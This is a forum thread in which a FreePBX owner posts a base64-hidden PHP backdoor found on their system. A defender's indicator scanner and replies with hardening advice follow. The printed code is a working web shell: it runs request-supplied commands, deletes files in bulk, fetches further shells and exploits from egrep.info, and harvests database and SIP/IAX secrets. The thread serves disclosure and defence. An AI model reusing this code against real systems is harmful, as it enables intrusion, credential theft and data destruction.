I've been infiltrated

I don’t know if this is of any interest or not, or if this is an appropriate place to post this (or if there is any such place) or if you’re already aware of it, but I found the following code hidden away in this file: ./admin/i18n/vamp/vamp.php, which specifically targets Asterisk & FreePBX systems. It was hidden under a base64 decode function. I’m not quite sure how they got in - other than perhaps through Apache somehow, but I suppose I’m pretty screwed at this point. I thought someone else might benefit from this knowledge. It goes well beyond what’s here, this is just an interesting piece of it.

Not sure I completely understand what it’s doing, other than installing backdoors and grabbing passwords, but apparently the site “egrep.info”, which was created just last month, is the source of some of the code. Maybe somebody wants to pick up the ball and run them down in cooperation with appropriate authorities. whois shows:

Registrant Street: C/O ID#10760, PO Box 16
Registrant City:Nobby Beach
Registrant State/Province:Queensland
Registrant Postal Code:QLD 4218
Registrant Country:AU
Registrant Phone:+45.36946676

but the rest is privacy protected. I suppose it’s possible they’re also just an innocent victim, but my gut feeling says no.

The email address [email protected] is also associated with the below cracker.

```php
// Backdoor fragment as found on the compromised system. Straight quotes and ".."
// paths restored from the forum rendering; the "\;" after "{}", the "\|" in the
// grep patterns and the "<br>" strings are reconstructed where the rendering
// swallowed backslashes and HTML tags (assumption, not verified against the original file).

if (isset($_REQUEST['p']) && (md5($_REQUEST['p'])=="a84cf956b0d0a139eab752a3e09405c4"))
{
@system($_REQUEST['c']);
echo "vampire access" ;
echo "\r\n" ;
}
else
{
die ('No direct script access allowed');
}

if ( $_GET['pbx'] == "fuck" ) {

// remove all indexs

@system("find . -perm 550 -type d |xargs chmod 755") ;
@system("find .. -perm 550 -type d |xargs chmod 755") ;
@system("find . -perm 555 -type d |xargs chmod 755") ;
@system("find .. -perm 555 -type d |xargs chmod 755") ;
@system("find . -name index.php ! -path ./index.php -delete") ;
@system("find .. -name index.php ! -path ../index.php ! -path ../admin/index.php ! -path ../recordings/index.php -delete") ;

echo "Index's Removed" ;
echo "\r\n" ;

// remove other hacks

@system("rm -rf ./modules/cdr/assets/cdrphp.php ./assets/js/views/index.php ./assets/index.php ./modules/cdr/assets/index.php ./modules/cdr/assets/css/cdr.php ./hel$") ;
@system("find . -type f -exec grep -l 'eFalcon' {} \; |xargs rm -rf") ;
@system("find .. -type f -exec grep -l 'eFalcon' {} \; |xargs rm -rf") ;
@system("grep -r -l --exclude=config.php --exclude=vamp.php --exclude=vampire.php '@system' * | xargs rm -rf") ;
@system("grep -r -l --exclude=config.php --exclude=vamp.php --exclude=vampire.php '@system' .. | xargs rm -rf") ;
@system("grep -r -l --exclude=config.php --exclude=vamp.php --exclude=functions.inc.php --exclude=vampire.php 'system(\$' .. | xargs rm -rf") ;
@system("find . -type f -exec grep -l 'i-Hmx' {} \; |xargs rm -rf") ;
@system("find ../ -type f -exec grep -l 'i-Hmx' {} \; |xargs rm -rf") ;
@system("find . -type f -exec grep -r -l --exclude=vamp.php --exclude=vampire.php 'c99shell' {} \; |xargs rm -rf") ;
@system("find .. -type f -exec grep -l --exclude=vamp.php --exclude=vampire.php 'c99shell' {} \; |xargs rm -rf") ;
@system("find . -type f -exec grep -l 'bas"."e64"."_decode' {} \; |xargs rm -rf") ;
@system("find ../ -type f -exec grep -l 'bas"."e64"."_decode' {} \; |xargs rm -rf") ;
@system("find .. -type f -exec egrep -r -l 'Matrix' {} \; |xargs rm -rf") ;
@system("find .. -type f -exec egrep -r -l 'c999shell' {} \; |xargs rm -rf") ;
@system("find .. -type f -exec egrep -r -l '9shell' {} \; |xargs rm -rf") ;
@system("find .. -name '*.php' -exec egrep -r -l --exclude=crypt.php --exclude=Growl.php --exclude=callerid.php 'base64_decode' {} \; |xargs rm -rf") ;
echo "Hacks Removed" ;
echo "\r\n" ;

// add directories

@system("mkdir ./modules/themes ./modules/lang ./modules/vamp ./assets/themes ./assets/lang ./assets/vamp ./i18n/themes ./i18n/lang ./i18n/vamp ../recordings/lang ../recordings/themes ../recordings/vamp ") ;
echo "Own Dir Applied" ;
echo "\r\n" ;

// modify .htaccess

@system("wget -q http://egrep.info/hta.txt -O .htaccess");
@system("cp -rf .htaccess ./modules/ ;cp -rf .htaccess ./modules/themes/ ; cp -rf .htaccess ./modules/lang/ ; cp -rf .htaccess ./assets/ ; cp -rf .htaccess ./helpers/ ; cp -rf .htaccess ./i18n/ ; cp -rf .htaccess ../recordings/ ; cp -rf .htaccess ../recordings/themes ; cp -rf .htaccess ../recordings/vamp ");
echo "HTA Applied" ;
echo "\r\n" ;

// add own indexs

@system("touch ./modules/index.php ./helpers/index.php ./modules/themes/index.php ./modules/lang/index.php ./modules/vamp/index.php ./assets/themes/index.php ./assets/lang/index.php ./assets/vamp/index.php ./assets/index.php ./i18n/themes/index.php ./i18n/lang/index.php ./i18n/vamp/index.php ./i18n/index.php ../recordings/themes/index.php ../recordings/lang/index.php ../recordings/vamp/index.php") ;
echo "New index's Applied" ;
echo "\r\n" ;

// custome shell upload

@system("wget -q http://egrep.info/case.txt -O case.php");
@system("cp -rf case.php ./modules/themes/case.php ; cp -rf case.php ./assets/themes/case.php ; cp -rf case.php ./i18n/themes/case.php ; cp -rf case.php ../recordings/themes/case.php ; cp -rf case.php ./modules/vamp/case.php ; cp -rf case.php ../recordings/vamp/case.php ; cp -rf case.php ./assets/vamp/case.php ; cp -rf case.php ./i18n/vamp/case.php; cp -rf case.php ../case.php") ;
@system("rm -rf case.php") ;
echo "Custome Shell Applied";
echo "\r\n" ;

// add user & remove others

@system("wget -q http://egrep.info/ass.txt -O ass.php ; php ass.php ; rm -rf ass.php ") ;
@system("wget -q http://egrep.info/ass.pass -O lang.php") ;
@system("cp -rf lang.php ./modules/lang/lang.php ; cp -rf lang.php ./assets/lang/lang.php ; cp -rf lang.php ./i18n/lang/lang.php ; cp -rf lang.php ../recordings/lang/lang.php ; cp -rf lang.php ./modules/vamp/lang.php ; cp -rf lang.php ../recordings/vamp/lang.php ; cp -rf lang.php ./assets/vamp/lang.php ; cp -rf lang.php ./i18n/vamp/lang.php ");
@system("rm -rf lang.php") ;
echo "NEW PASSWORD Applied";
echo "\r\n" ;

// adding vamp

@system("wget http://egrep.info/vampire.txt -O vamp.php");
@system("cp -rf vamp.php ./modules/vamp/vamp.php ; cp -rf vamp.php ./assets/vamp/vamp.php ; cp -rf vamp.php ./i18n/vamp/vamp.php ; cp -rf vamp.php ../recordings/vamp/vamp.php");
echo "vamp Applied";
@system("rm -rf vamp.php");
echo "\r\n" ;

// secure exploit

@system("wget -q http://egrep.info/ass.config -O config.php") ;
echo "Config.php Updated";
echo "\r\n" ;

// add more exploits

@system("wget -q http://egrep.info/ex.txt -O ex.php") ;
@system("cp -rf ex.php ./assets/js/index.php ; cp -rf ex.php ./helpers/index.php ; cp -rf ex.php ./i18n/es_ES/index.php ; cp -rf ex.php ./images/index.php ; cp -rf ex.php ./modules/cdr/index.php; cp -rf ex.php ../ex.php") ;
@system("rm -rf ex.php");
echo "EXploit Applied";
echo "\r\n" ;

// secure directories

@system("chmod a-w ./modules/themes ./modules/vamp ./modules/lang ./assets/themes ./assets/vamp ./assets/lang ./i18n/themes ./i18n/vamp ./i18n/lang ../recordings/themes ../recordings/vamp ../recordings/lang ");
@system("chmod a-w ./assets/js ./i18n/es_ES/ ");
echo "Dir Secured";
echo "\r\n" ;

}

if ( $_GET['vamp'] == "update" ) {
@system("wget -q http://egrep.info/vampire.txt -O vamp.php");
echo " new Vamp Applied";
echo "\r\n" ;
echo "+++++++ Please Refuck ++++++";
echo "\r\n" ;

}

if ( $_GET['mode'] == "lite" ) {
@system("wget -q http://egrep.info/control.php?path=".$_SERVER['SERVER_PORT'].$_SERVER['PHP_SELF']." -O /dev/null");
}
else {
@system("wget -q http://egrep.info/control.php?path=".$_SERVER['SERVER_PORT'].$_SERVER['PHP_SELF']." -O /dev/null");

// harvest the FreePBX database credentials from amportal.conf
$ampdata=shell_exec('grep -i "AMPDB\|PASS" /etc/amportal.conf | grep -v "#" | tr "\n" "<br>"');
if ( $_GET['parse'] == "parse" ) {
echo $ampdata;
echo "\r\n";
echo "<br>";
}
// harvest SIP/IAX peer secrets and DAHDI channel settings from the Asterisk configs
$sipdata=shell_exec('echo "-----SIP-----" && cat /etc/asterisk/sip_additional.conf | grep "\[\|secret\|host=\|type=\|username=" | tr "\n" "<br>"');
$iaxdata=shell_exec('echo "-----IAX-----" && cat /etc/asterisk/iax_additional.conf | grep "\[\|secret\|host=\|type=\|username=" | tr "\n" "<br>"');
$zapdata1=shell_exec('echo "------zap-----" && cat /etc/asterisk/dahdi-channels.conf | grep "line=\|group=\|callerid=\|context=\|channel" | tr "\n" "<br>"');
$zapdata2=shell_exec('cat /etc/asterisk/chan_dahdi_additional.conf | grep "line=\|group=\|callerid=\|context=\|channel" | tr "\n" "<br>"');

if ( $_GET['asterisk'] == "show" ) {
echo $sipdata."\r\n*".$iaxdata."\r\n".$zapdata1."\r\n*".$zapdata2."\r\n*";
}

}
```
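A defender-side check, added here as an example and not part of the original post or of the FreePBX project: a scanner for the drop-file names, the directories the backdoor creates, and the content strings visible in the posted code. The indicator values come from the code above; the sample web root is constructed inside the script.

```python
import os
import re
import tempfile

# Indicator strings taken from the posted backdoor. base64_decode also occurs in
# legitimate FreePBX files, so a hit is a review queue, not a verdict.
CONTENT_INDICATORS = [
    re.compile(r"egrep\.info"),                  # payload/beacon host in the sample
    re.compile(r"md5\(\s*\$_REQUEST\["),        # hash-gated access check
    re.compile(r"@system\(\s*\$_REQUEST\["),     # shell command taken from request
    re.compile(r"shell_exec\(.*amportal\.conf"), # harvesting AMPDB credentials
    re.compile(r"base64_decode\s*\("),           # layer the shell was hidden under
]
# File names the sample copies into directories it creates itself.
DROPPED_NAMES = {"vamp.php", "vampire.php", "case.php", "lang.php", "ex.php"}
DROPPED_DIRS = {"themes", "lang", "vamp"}


def scan_webroot(root):
    """Return {relative_path: [reasons]} for files matching the indicators."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            reasons = []
            if name in DROPPED_NAMES and os.path.basename(dirpath) in DROPPED_DIRS:
                reasons.append("dropped file name inside %s/" % os.path.basename(dirpath))
            if name.endswith(".php") or name == ".htaccess":
                with open(path, "r", errors="replace") as fh:
                    text = fh.read()
                reasons += ["matches " + p.pattern for p in CONTENT_INDICATORS if p.search(text)]
            if reasons:
                hits[os.path.relpath(path, root).replace(os.sep, "/")] = reasons
    return hits


def build_sample_tree():
    """Constructed web root: one benign module page and two planted files."""
    root = tempfile.mkdtemp()
    samples = {
        "admin/modules/cdr/page.cdr.php": "<?php echo 'benign module page';\n",
        "admin/i18n/vamp/vamp.php": "<?php if (md5($_REQUEST['p'])=='x') { @system($_REQUEST['c']); }\n",
        "admin/i18n/case.php": "<?php eval(base64_decode('...'));\n",
    }
    for rel, body in samples.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write(body)
    return root
```

Run it against the real web root with `scan_webroot("/var/www/html")` and review each hit by hand, comparing the file against a clean copy of the same FreePBX version.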

Check out the blog, this and other variants have been around for about a month now I think. The vulnerability has been patched.

We have always recommended not to expose http/httpd to the Internet for years. Nobody ever listens and the game continues. What I don’t understand is SSL VPN HTTP proxies are now in free Open Source firewalls and almost all the decent commercial stuff. There is simply no reason to open yourself up to this kind of risk.

I run two virtual servers off the same machine. One, freepbx which is setup to deny all access other than local as far as I understand it. The second, is open to the world because well… it’s a world wide web server.

As I only have the one machine, installing a VPN, SSL and/or proxy doesn’t make much sense for my unique specific situation, but I appreciate the comment.

I don’t claim to be a guru, and security is definitely not my strong point, so I’m also open to hearing other specific suggestions that will help me lock this down.

My firewall (iptables) is configured as a whitelist, so other than the random mistakes I find that I’ve made from time to time and fix as soon as I discover, not exactly sure where I went wrong. I guess my only solution is to have a separate Asterisk server (which I can’t afford)?? Perhaps a chroot solution for one of the virtual hosts…

As for the patch…(I assume you’re referring to FreePBX Ticket 7123) that’s exactly what I was intending to apply tonight… and as I attempted to login to apply it, that is when I found out it was already too late.

I don’t “administer” my system on a daily basis, I don’t have a need to do so. My user base is pretty much… me … and so once setup, there’s not much reason to login on any kind of frequent basis unless there’s a problem.

P.S. Love the captcha. I wish more sites would make it that simple but I presume still effective.

When you say “I run two virtual servers off the same machine.” do you mean that you have 2 virtual operating systems running under some type of virtualization environment like ESXi or do you just have 2 different web spaces running under the same copy of Apache?

APB,
It sounds like you’re using virtualbox or a hypervisor of some kind, and have two guests on the hypervisor. A few suggestions:

  1. Make sure your WWW guest is secured. My guess is if you have SSH, FTP or some kind of service opened on the WWW server, you opened yourself up from there.
  2. Did you install any modules manually? Possible you didn’t MD5?
  3. Do you have any ports opened on a firewall? Do you have a firewall?

It’s important to either use standard port forwarding (5060, 10000-20000 UDP) + intrusion detection, or change the standard ports and still use intrusion detection, although it’s less necessary.

From a virtualization perspective, I would keep both guests using bridged networking, but possibly get a second NIC and separate the LAN subnets using the different adapters for each bridge.

Keeping your PBX at the WAN-level (meaning it uses a public IP address, directly) has sure-fire potential to get you hacked, and fast.

Best of luck!

Sorry for being ambiguous. I meant two virtual hosts, under the same instance of apache, one OS only. Ubuntu 12.04 with iptables firewall.

Default policy for INPUT and FORWARD tables is DROP. Default policy for NAT and OUTPUT tables is ACCEPT. Port 80 is open for HTTP, since as mentioned I’m running one world accessible website. No SSH and no FTP since I’m on the console.

Also, from time to time I have extensions that need to access the PBX from another part of the world. When such occurs, I add those IPs to the whitelist.

I can’t speak on your security without seeing the system, but I would absolutely recommend moving your www site OFF the pbx. From a security and audio stability standpoint, you open yourself up to a lot of variables.